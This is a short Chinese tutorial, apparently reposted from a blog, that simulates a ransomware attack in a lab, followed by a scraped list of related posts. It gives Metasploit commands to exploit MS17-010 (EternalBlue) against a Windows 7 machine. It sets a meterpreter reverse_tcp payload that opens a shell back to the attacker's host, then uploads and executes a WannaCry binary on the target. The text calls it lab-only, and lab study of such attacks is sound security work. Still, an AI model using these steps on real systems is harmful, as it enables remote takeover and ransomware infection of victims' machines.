勒索病毒场景模拟及原理
一、环境准备
需准备如下环境及工具:
1) 一台攻击虚机(Kali linux),一台靶机(Win7 64位)
3) 永恒之蓝(wannacry)病毒文件
二、环境准备
1.在kali linux下启动msfconsole
通过该应用,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等。
root@kali:~#msfconsole
2.利用永恒之蓝MS17-010漏洞
msf > use exploit/windows/smb/ms17_010_eternalblue
3. 设定靶机 IP 和操作机 IP
172.22.170.4为操作机kali-linux ip地址
172.22.171.4为靶机windows 7 ip地址
msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 172.22.171.4 msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 172.22.170.4
4.设置TCP连接
使用meterpreter编写的TCP反弹连接木马,用于在渗透成功后向攻击机发起连接请求进一步控制靶机的模块。
set payload windows/x64/meterpreter/reverse_tcp
5.进行渗透
界面如下显示,则表示渗透成功
6.向目标主机传输病毒文件(慎用,仅用于实验测试)
成功传输
6.在目标主机上执行该病毒文件
execute -f C:\\Wannacry.exe
7.目标主机被攻陷
转载于:https://www.cnblogs.com/yaqiong-hu/p/10623744.html
勒索病毒场景模拟及原理相关推荐
- 解密Globeimposter-Alpha865qqz勒索病毒:如何恢复被加密的数据文件?
导语: 随着数字化时代的到来,网络安全威胁也日益增加,其中勒索病毒是当前备受关注的问题之一.Globeimposter-Alpha865qqz勒索病毒作为其中的一种,已经给无数用户带来了沉重的打击和困 ...
- python模拟勒索病毒
python模拟勒索病毒 勒索病毒原理 [定义及传播]勒索病毒,是一种新型电脑病毒,主要以邮件.程序木马.网页挂马的形式进行传播.关于勒索病毒,最通俗易懂的理解就是,黑客通过攻击你的系统,把你的重要文 ...
- 【安全攻防系列 Windows实战】教你如何 FTP暴力破解、四大病毒勒索病毒、蠕虫病毒、ARP病毒、挖矿病毒,怎么处理应急场景
文章目录 FTP暴力破解 0x00 前言 0x01 应急场景 0x02 日志分析 0x04 处理措施 勒索病毒 0x00 前言 0x01 应急场景 0x02 事件分析 0x04 防范措施 蠕虫病毒 0 ...
- “微信勒索病毒”全纪实:打扰了,我只是病毒界的杨超越
作者 | 史中 本文经授权转自"浅黑科技"(qianheikeji) 你要相信,这世界上总有那么一种人,自己没想火,却一夜之间火得妈都不认识.比如参加选秀就是为了2000块钱+盒饭 ...
- 勒索病毒的发展史及解密办法
勒索病毒就像是游走在互联网里的有害细胞,形式多变且难以捉摸.而它的蔓延,给企业和个人都带来了严重的安全威胁. 所以,今天鹅师傅就来扒一扒关于勒索病毒的那些事以及普通人应该如何有效"自救&qu ...
- 修改jar 注入_ORA00600[16703]安装介质注入型勒索病毒恢复案例
早期客户数据库软件被注入恶意代码,导致数据库无法启动,报错ORA-00600: internal error code, arguments:[16703], [1403], [20],由于恶意攻击, ...
- 勒索病毒大爆发,教你提前做好预防措施
2010年6月震网(Stuxnet)病毒首次被检测出来,它是第一个专门定向攻击真实世界中基础(能源)设施的"蠕虫"病毒,比如核电站,水坝,国家电网."震网"病毒 ...
- 客户端访问https时应无浏览器(含终端)安全警告信息;_可防范勒索病毒,互联网隔离安全技术的5个技能包...
接到公司继续线上办公一周的通知,于是和IT圈子里的朋友聊天,除了远程办公开视频会议遇到的各种问题之外,不觉间聊到了安全话题,比如,最近微盟员工通过个人VPN登录内网跳板机,破坏生产系统数据库的个人行为 ...
- 「诺亚」升级|进阶主动防御,勒索病毒持续免疫
2018年,某制造业非核心服务器第一次被勒索后,选择当地厂商进行解密,然而一周后病毒再次来袭,没有任何防护能力的核心服务器及财务PC被加密,而部署诺亚防勒索系统的服务器正常运行. 2019年,诺亚防勒 ...
最新文章
- 灯泡亮度控制单片机_南航电赛-灯光控制系统
- mysql 分页优化
- redhat6.5 配置使用centos的yum源
- Spring Boot:定制自己的starter
- 新的信息论诞生前的若干问题分析
- 如何使用 C# 扩展方法
- linux进程和计划任务,linux进程和计划任务
- 一个小码农对嵌入式的理解
- 子程序调用编程序例子_汇编程序设计:LCD1602静态显示
- 一位 Rust 开发者的 Go 初体验
- matplotlib 可视化 —— matplotlib.patches
- c++ 读取hdmi输入信号_小白需要知道HDMI知识
- staitc 变量以及成员
- 2022华中杯C题矿井提升机钢丝绳的缺陷分析思路讲解
- 服务器每个月维护要1000元,5月24日服务器例行维护公告(已完成)
- 读《An Adaptable and Extensible Geometry Kernel》
- 【离散数学】数理逻辑 第一章 命题逻辑(5) 对偶式、对偶原理
- CPU执行程序的原理(简化过程)
- 京东云 - 增值税发票识别
- 玻色量子CEO文凯受邀出席首经贸金融学院系列讲座
热门文章
- react-native使用高德地图获取当前地理位置
- 打印机显示另一台计算机正在使用,惠普打印机显示“由于另一个程序或另一台计算机正在使用联网的HP成像设备因此无法执行”怎么办?...
- 关于rac环境中的alter ext进程名, begin now
- mysql jdbc关闭连接_【B站Java两分钟】JDBC数据库简单使用,封装连接,关闭
- android:如何在TextView实现图文混排
- vmware 几种联网的方式,如何实现虚拟机上网
- STM32读取旋钮编码器
- 文库网站的文件转换源码分享
- CSS3粒子连接动画
- 融创服务危机四伏:体量小、价格高,九成物业收入靠融创中国